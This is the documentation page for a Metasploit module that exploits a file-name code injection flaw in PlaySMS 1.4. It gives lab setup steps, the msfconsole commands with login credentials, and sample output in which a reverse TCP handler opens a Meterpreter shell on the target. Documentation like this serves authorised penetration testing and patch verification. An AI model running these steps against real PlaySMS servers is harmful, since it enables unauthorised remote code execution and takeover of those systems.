## Description
This module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB [42044](https://www.exploit-db.com/exploits/42003/).

## Vulnerable Application 
Available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz)

### Vulnerable Application Installation Setup.
 1. Download Application : `wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
 2. Extract : `tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
 3. Move In WebDirectory : `mv playsms-1.4/web/* /var/www/html/`
 4. make config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
 5. Change Owner : `chown -R www-data:www-data /var/www/html/`
 6. Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.
 7. Now Visit : http://localhost/

## Verification Steps

 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/multi/http/playsms_filename_exec`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi SecreTSMSgatwayLogin`
 7. Do: `set username touhid`
 8. Do: `set password diana`
 9. Do: `check`
```
[*] 10.22.1.10:80 The target appears to be vulnerable.
```
 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `exploit`
 13. You should get a shell.


## Scenarios
### Playsms on Ubuntu Linux
```
msf exploit(multi/http/playsms_filename_exec) > run                                                                                    
                                                                                                                                       
[*] Started reverse TCP handler on 10.22.1.3:4444                                                                                      
[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2                                                                          
[*] Trying to Login ......                                                                                                             
[+] Authentication successful : [ touhid:diana ]                                                                                       
[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc                                                                         
[*] Trying to upload file with malicious Filename Field....                                                                            
[*] Sending stage (37775 bytes) to 10.22.1.15                                                                                          
[*] Sleeping before handling stage...                                                                                                  
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530                                     
                                                                                                                                       
meterpreter >
```